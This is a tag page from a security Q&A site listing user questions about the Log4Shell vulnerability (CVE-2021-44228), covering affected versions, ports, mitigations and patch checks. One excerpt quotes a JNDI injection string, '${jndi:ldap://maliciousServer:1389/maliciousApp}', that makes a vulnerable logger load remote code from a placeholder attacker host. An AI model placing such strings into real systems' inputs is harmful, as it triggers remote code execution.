Questions tagged [log4shell]

Questions about CVE-2021-44228, a vulnerability in the Log4j library allowing remote code execution.

22 questions
86
votes
3 answers

Does CVE-2021-44228 impact Log4j ports?

Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren't because the vulnerability uses JNDI (Java Naming and Directory Interface),…
Fire Quacker
  • 2,432
  • 1
  • 19
  • 29
70
votes
1 answer

How does the log4shell vulnerability work?

Log4shell is making the news. A vulnerability in the widely used logging tool Log4J is putting many servers and even some desktop applications at risk of remote code execution. How does this vulnerability work? What sort of mistake makes it…
Anders
  • 64,406
  • 24
  • 178
  • 215
35
votes
3 answers

Am I protected from Log4j vulnerability if I run Java 8u121 or newer?

According to the notes for CVE-2021-44228 at mitre.org: Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase"…
Appleoddity
  • 503
  • 1
  • 4
  • 7
12
votes
2 answers

How can the Log4Shell exploit affect an end user?

I am not an expert in security items and exploits - so there I would like to know how this recent Log4Shell exploit can affect me as an end user. Reading the news, the exploit can affect services like "Twitter", "Apple" etc.. But what does it mean…
Alex
  • 251
  • 3
6
votes
3 answers

At which OS privilege level log4j usually runs?

Considering that a RCE vulnerability has been recently found in the log4j library, a library used in a lot more applications than I thought. The following question comes to my mind. If an attacker successfully exploits log4shell, does the payload…
pmbonneau
  • 161
  • 2
  • 2
  • 10
4
votes
1 answer

Does the log4j RCE vulnerability run even if the message is just a part of the logged string?

Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string? For example, if the code contains: paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}"; logger.debug("Request: {}",…
Lefteris E
  • 143
  • 2
3
votes
1 answer

How to find out I an application is vulnerable for log4j?

I am using a Mac for my daily work, But I do not know if I am vulnerable for the log4j exploit. Is there a way to find out? Is there a way to find all the applications that are using java? How to protect me? Update java? Update the log library?…
Alex
  • 251
  • 3
3
votes
1 answer

Can one protect from the Log4j exp by sanitizing the parameters?

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE). (From an email CloudFlare sent to users) Is a site susceptible to the Log4J exploit if…
3
votes
1 answer

How to validate if Log4Shell patch is applied?

Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, to 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is depending on log4j-core:2.15.0 and…
53c
  • 133
  • 4
1
vote
2 answers

Is log4j-over-slf4j vulnerable to log4shell?

On my server, I looked at all files containing log4j, and I only have an log4j-over-slf4j jar file. SLF4J's page about log4shell states the following: If you are using log4j-over-slf4j.jar in conjunction with the SLF4J API, you are safe unless the…
1
vote
0 answers

Is removing the `${jndi:` string a mitigation of the log4j security issue?

Recently, the log4j issue got a lot of attention. I run a chatbot web app that is not based on the JAVA stack. However, there is a backend component that analyzes the chatbot user input which is based on JAVA. I wonder to mitigate the log4j issue,…
Iching Chang
  • 111
  • 2
1
vote
0 answers

Should vendors add their CPEs in the log4j NIST entry?

Software that has packaged a vulnerable version of the log4j library is considered vulnerable to CVE-2021-44228 or "log4shell". When I look at the NIST definition I can see that the vulnerable versions of log4j are listed, as well as configurations…
Neil P
  • 181
  • 4
1
vote
1 answer

Log4shell - Should affected servers be "nuked from the orbit"?

Considering how log4shell seems trivial to exploit and the important control level it gives to an attacker, should we wipe everything affected and start over? For example, we find out that a publicly accessible server in production has log4j…
pmbonneau
  • 161
  • 2
  • 2
  • 10
1
vote
0 answers

Clarification on log4j Service Requirements

We're currently trying to prioritize our mitigations for CVE-2021-44228. The obvious priority is to deal with any Internet facing java (apache?) applications that use a vulnerable log4j library and\or Java binary first. For multi-user Linux systems,…
1
vote
2 answers

Absence of JndiLookup class on vulnerable version number... Log4Shell safe?

If a version of log4j2 is present on a server (say, 2.5 or 2.7) but the JndiLookup class does not exist in any jars, does this mean this specific implementation of log4j2 is not vulnerable to Log4Shell?
Marcel
  • 121
  • 4
1
2